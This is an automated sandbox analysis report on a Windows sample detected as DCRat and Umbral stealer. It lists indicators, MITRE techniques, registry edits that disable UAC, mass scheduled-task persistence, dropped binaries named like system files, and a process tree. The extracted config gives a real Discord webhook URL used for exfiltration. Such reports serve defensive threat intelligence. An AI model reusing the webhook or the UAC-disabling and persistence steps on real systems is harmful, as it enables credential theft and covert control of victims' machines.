dcrat | 16771b819b03044356bad5b6d2a6b0f84e7fbd94c336743b58bbe5dc2e2ccbe8

Analysis

max time kernel
261s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
11-05-2024 20:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7ebabb8b4bb51cf.exe
Size

8.1MB
MD5

9ae6eccd4947fa65016152db60a1e9c4
SHA1

ac6693c8fc03c286c93860e0c13474151c2f1557
SHA256

16771b819b03044356bad5b6d2a6b0f84e7fbd94c336743b58bbe5dc2e2ccbe8
SHA512

11974385658bd5a20819cf859c7058198f61fbad1566ddbd9788806097b559434ba8cd12a59ea82dd86e3c8a225571d3b2cac3a97514c20cdbe49f6a0423adf8
SSDEEP

49152:Evqgk7XySAxNIQcmwYEhwUdKTMcZONvPUMPbANZ9B0hKuSZDidHutYPibit:Phzt

Score

10^/10

dcrat umbral evasion execution infostealer rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1238029585401118791/gfyAlvpc7SDO3NG27soVqIFhCMnxRnPz2IckSI5fgwGxsHtYvpmkNmab2e4eUEVs2XqF

Signatures

DcRat 56 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

description	ioc	pid	Process
		4040	schtasks.exe
		4480	schtasks.exe
		2028	schtasks.exe
		4884	schtasks.exe
		1468	schtasks.exe
		4632	schtasks.exe
		2220	schtasks.exe
		2032	schtasks.exe
File created	C:\Windows\L2Schemas\22eafd247d37c3		savesref.exe
		2624	schtasks.exe
		1168	schtasks.exe
		3324	schtasks.exe
		4544	schtasks.exe
		704	schtasks.exe
		3472	schtasks.exe
		1440	schtasks.exe
		4528	schtasks.exe
		4336	schtasks.exe
		1392	schtasks.exe
		3104	schtasks.exe
		3968	schtasks.exe
		3948	schtasks.exe
		3824	schtasks.exe
		5032	schtasks.exe
		1580	schtasks.exe
		1360	schtasks.exe
		2964	schtasks.exe
		2280	schtasks.exe
		1680	schtasks.exe
		4916	schtasks.exe
		3784	schtasks.exe
		3872	schtasks.exe
		5080	schtasks.exe
		228	schtasks.exe
		1312	schtasks.exe
		540	schtasks.exe
		4516	schtasks.exe
		4960	schtasks.exe
		2016	schtasks.exe
		3628	schtasks.exe
		5028	schtasks.exe
		3200	schtasks.exe
		4984	schtasks.exe
		1364	schtasks.exe
		2972	schtasks.exe
		5088	schtasks.exe
		1212	schtasks.exe
		2816	schtasks.exe
		880	schtasks.exe
		2228	schtasks.exe
		3036	attrib.exe
		3604	schtasks.exe
		5052	schtasks.exe
		3536	schtasks.exe
		4664	schtasks.exe
		4456	schtasks.exe

Detect Umbral payload 3 IoCs

resource	yara_rule
behavioral2/memory/2888-5-0x0000000000400000-0x000000000060E000-memory.dmp	family_umbral
behavioral2/files/0x0007000000023418-28.dat	family_umbral
behavioral2/memory/2588-31-0x0000029450950000-0x0000029450990000-memory.dmp	family_umbral

Process spawned unexpected child process 54 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1364	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3472	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3872	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4456	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3200	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3604	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2972	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5088	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4960	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2964	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4544	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4632	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5052	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1360	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5080	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	228	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1392	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	704	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1440	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1312	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2028	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4040	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2016	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2220	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2280	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3536	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3948	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3824	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2032	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5032	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1680	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4984	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	540	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1212	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1168	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2624	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4664	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1580	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4916	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3968	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4480	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3628	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4528	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1468	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2816	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3784	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4336	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5028	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4516	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4884	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	880	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3324	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3104	3556	schtasks.exe	105
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2228	3556	schtasks.exe	105

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	savesref.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	savesref.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	savesref.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

DCRat payload 13 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/memory/2888-5-0x0000000000400000-0x000000000060E000-memory.dmp	dcrat
behavioral2/files/0x0007000000023417-16.dat	dcrat
behavioral2/files/0x000700000002341c-123.dat	dcrat
behavioral2/memory/1340-125-0x0000000000A00000-0x0000000000B8C000-memory.dmp	dcrat
behavioral2/files/0x000700000002344e-193.dat	dcrat
behavioral2/files/0x0008000000023418-223.dat	dcrat
behavioral2/files/0x0010000000023379-237.dat	dcrat
behavioral2/files/0x0008000000023426-259.dat	dcrat
behavioral2/files/0x0009000000023428-262.dat	dcrat
behavioral2/files/0x000800000002343d-356.dat	dcrat
behavioral2/files/0x000900000002338d-393.dat	dcrat
behavioral2/memory/3444-395-0x0000000000460000-0x00000000005EC000-memory.dmp	dcrat
behavioral2/memory/408-399-0x0000000000020000-0x00000000001AC000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2268	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	explorer.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	savesref.exe
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	RegAsm.exe
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	svchost.exe

Executes dropped EXE 5 IoCs

pid	Process
4760	svchost.exe
2588	explorer.exe
1340	savesref.exe
3444	sihost.exe
408	spoolsv.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	savesref.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	savesref.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	discord.com
24	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
19	ip-api.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4052 set thread context of 2888	4052	7ebabb8b4bb51cf.exe	85

Drops file in Program Files directory 35 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Common Files\StartMenuExperienceHost.exe	savesref.exe
File created	C:\Program Files\Windows Portable Devices\e1ef82546f0b02	savesref.exe
File opened for modification	C:\Program Files\Common Files\DESIGNER\Idle.exe	savesref.exe
File created	C:\Program Files (x86)\Windows NT\sihost.exe	savesref.exe
File created	C:\Program Files\Windows Portable Devices\SppExtComObj.exe	savesref.exe
File opened for modification	C:\Program Files (x86)\Windows NT\sihost.exe	savesref.exe
File opened for modification	C:\Program Files (x86)\Common Files\StartMenuExperienceHost.exe	savesref.exe
File opened for modification	C:\Program Files\Windows Portable Devices\SppExtComObj.exe	savesref.exe
File created	C:\Program Files (x86)\Common Files\Java\55b276f4edf653	savesref.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\7a0fd90576e088	savesref.exe
File created	C:\Program Files\Common Files\DESIGNER\Idle.exe	savesref.exe
File created	C:\Program Files (x86)\Common Files\55b276f4edf653	savesref.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\RCX6E0E.tmp	savesref.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\services.exe	savesref.exe
File created	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\c5b4cb5e9653cc	savesref.exe
File created	C:\Program Files (x86)\Common Files\Microsoft Shared\explorer.exe	savesref.exe
File opened for modification	C:\Program Files (x86)\Common Files\RCX7C33.tmp	savesref.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\services.exe	savesref.exe
File opened for modification	C:\Program Files\Common Files\DESIGNER\RCX7296.tmp	savesref.exe
File opened for modification	C:\Program Files (x86)\Common Files\Java\RCX61C0.tmp	savesref.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\RCX69D5.tmp	savesref.exe
File created	C:\Program Files\Common Files\DESIGNER\6ccacd8608530f	savesref.exe
File created	C:\Program Files (x86)\Windows NT\66fc9ff0ee96c2	savesref.exe
File opened for modification	C:\Program Files (x86)\Common Files\Java\RCX61B0.tmp	savesref.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\RCX6E0F.tmp	savesref.exe
File opened for modification	C:\Program Files (x86)\Windows NT\RCX79B1.tmp	savesref.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCX8159.tmp	savesref.exe
File opened for modification	C:\Program Files (x86)\Common Files\RCX7C34.tmp	savesref.exe
File opened for modification	C:\Program Files\Windows Portable Devices\RCX8158.tmp	savesref.exe
File created	C:\Program Files (x86)\Common Files\Java\StartMenuExperienceHost.exe	savesref.exe
File opened for modification	C:\Program Files (x86)\Common Files\Java\StartMenuExperienceHost.exe	savesref.exe
File opened for modification	C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\RCX6957.tmp	savesref.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\explorer.exe	savesref.exe
File opened for modification	C:\Program Files\Common Files\DESIGNER\RCX7297.tmp	savesref.exe
File opened for modification	C:\Program Files (x86)\Windows NT\RCX79B2.tmp	savesref.exe

Drops file in Windows directory 20 IoCs

description	ioc	Process
File opened for modification	C:\Windows\L2Schemas\RCX59AB.tmp	savesref.exe
File opened for modification	C:\Windows\L2Schemas\RCX5A39.tmp	savesref.exe
File opened for modification	C:\Windows\L2Schemas\RCX6BDB.tmp	savesref.exe
File opened for modification	C:\Windows\Globalization\Sorting\RCX836D.tmp	savesref.exe
File opened for modification	C:\Windows\Globalization\Sorting\conhost.exe	savesref.exe
File created	C:\Windows\L2Schemas\TextInputHost.exe	savesref.exe
File created	C:\Windows\GameBarPresenceWriter\spoolsv.exe	savesref.exe
File created	C:\Windows\Globalization\Sorting\conhost.exe	savesref.exe
File created	C:\Windows\Globalization\Sorting\088424020bedd6	savesref.exe
File created	C:\Windows\L2Schemas\29c1c3cc0f7685	savesref.exe
File created	C:\Windows\GameBarPresenceWriter\f3b6ecef712a24	savesref.exe
File created	C:\Windows\L2Schemas\unsecapp.exe	savesref.exe
File opened for modification	C:\Windows\L2Schemas\unsecapp.exe	savesref.exe
File opened for modification	C:\Windows\GameBarPresenceWriter\RCX751A.tmp	savesref.exe
File opened for modification	C:\Windows\L2Schemas\TextInputHost.exe	savesref.exe
File created	C:\Windows\L2Schemas\22eafd247d37c3	savesref.exe
File opened for modification	C:\Windows\GameBarPresenceWriter\spoolsv.exe	savesref.exe
File opened for modification	C:\Windows\Globalization\Sorting\RCX836E.tmp	savesref.exe
File opened for modification	C:\Windows\L2Schemas\RCX6BDA.tmp	savesref.exe
File opened for modification	C:\Windows\GameBarPresenceWriter\RCX7519.tmp	savesref.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 54 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
228	schtasks.exe
1392	schtasks.exe
540	schtasks.exe
3784	schtasks.exe
1168	schtasks.exe
5088	schtasks.exe
5052	schtasks.exe
4040	schtasks.exe
2280	schtasks.exe
4984	schtasks.exe
1364	schtasks.exe
3200	schtasks.exe
2220	schtasks.exe
3628	schtasks.exe
4336	schtasks.exe
2016	schtasks.exe
3948	schtasks.exe
3824	schtasks.exe
2624	schtasks.exe
4916	schtasks.exe
3604	schtasks.exe
4632	schtasks.exe
1360	schtasks.exe
3872	schtasks.exe
4456	schtasks.exe
4960	schtasks.exe
3536	schtasks.exe
4480	schtasks.exe
3104	schtasks.exe
3472	schtasks.exe
1680	schtasks.exe
880	schtasks.exe
2972	schtasks.exe
5028	schtasks.exe
2028	schtasks.exe
5032	schtasks.exe
4664	schtasks.exe
2816	schtasks.exe
2228	schtasks.exe
2964	schtasks.exe
1312	schtasks.exe
4528	schtasks.exe
1468	schtasks.exe
4884	schtasks.exe
5080	schtasks.exe
1212	schtasks.exe
1580	schtasks.exe
4516	schtasks.exe
704	schtasks.exe
2032	schtasks.exe
3324	schtasks.exe
4544	schtasks.exe
1440	schtasks.exe
3968	schtasks.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
748	wmic.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\Local Settings	savesref.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4888	PING.EXE

Suspicious behavior: EnumeratesProcesses 28 IoCs

pid	Process
2268	powershell.exe
2268	powershell.exe
8	powershell.exe
8	powershell.exe
3280	powershell.exe
3280	powershell.exe
1312	powershell.exe
1312	powershell.exe
3828	powershell.exe
3828	powershell.exe
1340	savesref.exe
1340	savesref.exe
1340	savesref.exe
1340	savesref.exe
1340	savesref.exe
1340	savesref.exe
1340	savesref.exe
1340	savesref.exe
1340	savesref.exe
3444	sihost.exe
3444	sihost.exe
3444	sihost.exe
3444	sihost.exe
3444	sihost.exe
3444	sihost.exe
3444	sihost.exe
3444	sihost.exe
3444	sihost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3444	sihost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4052	7ebabb8b4bb51cf.exe
Token: SeDebugPrivilege	2588	explorer.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	3280	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeIncreaseQuotaPrivilege	404	wmic.exe
Token: SeSecurityPrivilege	404	wmic.exe
Token: SeTakeOwnershipPrivilege	404	wmic.exe
Token: SeLoadDriverPrivilege	404	wmic.exe
Token: SeSystemProfilePrivilege	404	wmic.exe
Token: SeSystemtimePrivilege	404	wmic.exe
Token: SeProfSingleProcessPrivilege	404	wmic.exe
Token: SeIncBasePriorityPrivilege	404	wmic.exe
Token: SeCreatePagefilePrivilege	404	wmic.exe
Token: SeBackupPrivilege	404	wmic.exe
Token: SeRestorePrivilege	404	wmic.exe
Token: SeShutdownPrivilege	404	wmic.exe
Token: SeDebugPrivilege	404	wmic.exe
Token: SeSystemEnvironmentPrivilege	404	wmic.exe
Token: SeRemoteShutdownPrivilege	404	wmic.exe
Token: SeUndockPrivilege	404	wmic.exe
Token: SeManageVolumePrivilege	404	wmic.exe
Token: 33	404	wmic.exe
Token: 34	404	wmic.exe
Token: 35	404	wmic.exe
Token: 36	404	wmic.exe
Token: SeIncreaseQuotaPrivilege	404	wmic.exe
Token: SeSecurityPrivilege	404	wmic.exe
Token: SeTakeOwnershipPrivilege	404	wmic.exe
Token: SeLoadDriverPrivilege	404	wmic.exe
Token: SeSystemProfilePrivilege	404	wmic.exe
Token: SeSystemtimePrivilege	404	wmic.exe
Token: SeProfSingleProcessPrivilege	404	wmic.exe
Token: SeIncBasePriorityPrivilege	404	wmic.exe
Token: SeCreatePagefilePrivilege	404	wmic.exe
Token: SeBackupPrivilege	404	wmic.exe
Token: SeRestorePrivilege	404	wmic.exe
Token: SeShutdownPrivilege	404	wmic.exe
Token: SeDebugPrivilege	404	wmic.exe
Token: SeSystemEnvironmentPrivilege	404	wmic.exe
Token: SeRemoteShutdownPrivilege	404	wmic.exe
Token: SeUndockPrivilege	404	wmic.exe
Token: SeManageVolumePrivilege	404	wmic.exe
Token: 33	404	wmic.exe
Token: 34	404	wmic.exe
Token: 35	404	wmic.exe
Token: 36	404	wmic.exe
Token: SeIncreaseQuotaPrivilege	2952	wmic.exe
Token: SeSecurityPrivilege	2952	wmic.exe
Token: SeTakeOwnershipPrivilege	2952	wmic.exe
Token: SeLoadDriverPrivilege	2952	wmic.exe
Token: SeSystemProfilePrivilege	2952	wmic.exe
Token: SeSystemtimePrivilege	2952	wmic.exe
Token: SeProfSingleProcessPrivilege	2952	wmic.exe
Token: SeIncBasePriorityPrivilege	2952	wmic.exe
Token: SeCreatePagefilePrivilege	2952	wmic.exe
Token: SeBackupPrivilege	2952	wmic.exe
Token: SeRestorePrivilege	2952	wmic.exe
Token: SeShutdownPrivilege	2952	wmic.exe
Token: SeDebugPrivilege	2952	wmic.exe
Token: SeSystemEnvironmentPrivilege	2952	wmic.exe
Token: SeRemoteShutdownPrivilege	2952	wmic.exe
Token: SeUndockPrivilege	2952	wmic.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 4052 wrote to memory of 2888	4052	7ebabb8b4bb51cf.exe	85
PID 4052 wrote to memory of 2888	4052	7ebabb8b4bb51cf.exe	85
PID 4052 wrote to memory of 2888	4052	7ebabb8b4bb51cf.exe	85
PID 4052 wrote to memory of 2888	4052	7ebabb8b4bb51cf.exe	85
PID 4052 wrote to memory of 2888	4052	7ebabb8b4bb51cf.exe	85
PID 4052 wrote to memory of 2888	4052	7ebabb8b4bb51cf.exe	85
PID 4052 wrote to memory of 2888	4052	7ebabb8b4bb51cf.exe	85
PID 4052 wrote to memory of 2888	4052	7ebabb8b4bb51cf.exe	85
PID 4052 wrote to memory of 2888	4052	7ebabb8b4bb51cf.exe	85
PID 2888 wrote to memory of 4760	2888	RegAsm.exe	87
PID 2888 wrote to memory of 4760	2888	RegAsm.exe	87
PID 2888 wrote to memory of 4760	2888	RegAsm.exe	87
PID 2888 wrote to memory of 2588	2888	RegAsm.exe	88
PID 2888 wrote to memory of 2588	2888	RegAsm.exe	88
PID 2588 wrote to memory of 3036	2588	explorer.exe	89
PID 2588 wrote to memory of 3036	2588	explorer.exe	89
PID 4760 wrote to memory of 2648	4760	svchost.exe	91
PID 4760 wrote to memory of 2648	4760	svchost.exe	91
PID 4760 wrote to memory of 2648	4760	svchost.exe	91
PID 2588 wrote to memory of 2268	2588	explorer.exe	93
PID 2588 wrote to memory of 2268	2588	explorer.exe	93
PID 2588 wrote to memory of 8	2588	explorer.exe	95
PID 2588 wrote to memory of 8	2588	explorer.exe	95
PID 2588 wrote to memory of 3280	2588	explorer.exe	97
PID 2588 wrote to memory of 3280	2588	explorer.exe	97
PID 2588 wrote to memory of 1312	2588	explorer.exe	99
PID 2588 wrote to memory of 1312	2588	explorer.exe	99
PID 2588 wrote to memory of 404	2588	explorer.exe	103
PID 2588 wrote to memory of 404	2588	explorer.exe	103
PID 2588 wrote to memory of 2952	2588	explorer.exe	106
PID 2588 wrote to memory of 2952	2588	explorer.exe	106
PID 2588 wrote to memory of 1580	2588	explorer.exe	108
PID 2588 wrote to memory of 1580	2588	explorer.exe	108
PID 2588 wrote to memory of 3828	2588	explorer.exe	111
PID 2588 wrote to memory of 3828	2588	explorer.exe	111
PID 2588 wrote to memory of 748	2588	explorer.exe	113
PID 2588 wrote to memory of 748	2588	explorer.exe	113
PID 2648 wrote to memory of 976	2648	WScript.exe	115
PID 2648 wrote to memory of 976	2648	WScript.exe	115
PID 2648 wrote to memory of 976	2648	WScript.exe	115
PID 976 wrote to memory of 1340	976	cmd.exe	117
PID 976 wrote to memory of 1340	976	cmd.exe	117
PID 2588 wrote to memory of 4716	2588	explorer.exe	137
PID 2588 wrote to memory of 4716	2588	explorer.exe	137
PID 4716 wrote to memory of 4888	4716	cmd.exe	140
PID 4716 wrote to memory of 4888	4716	cmd.exe	140
PID 1340 wrote to memory of 3184	1340	savesref.exe	178
PID 1340 wrote to memory of 3184	1340	savesref.exe	178
PID 3184 wrote to memory of 2692	3184	cmd.exe	180
PID 3184 wrote to memory of 2692	3184	cmd.exe	180
PID 3184 wrote to memory of 3444	3184	cmd.exe	181
PID 3184 wrote to memory of 3444	3184	cmd.exe	181

System policy modification 1 TTPs 6 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	savesref.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	savesref.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	savesref.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sihost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sihost.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3036	attrib.exe

C:\Users\Admin\AppData\Local\Temp\7ebabb8b4bb51cf.exe
"C:\Users\Admin\AppData\Local\Temp\7ebabb8b4bb51cf.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2888
- - C:\Users\Admin\AppData\Local\Temp\svchost.exe
    "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4760
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\discord\KVGHJrchTtXZ1.vbe"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2648
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\discord\91XI5GEPShJXCgG0eVHRJ.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:976
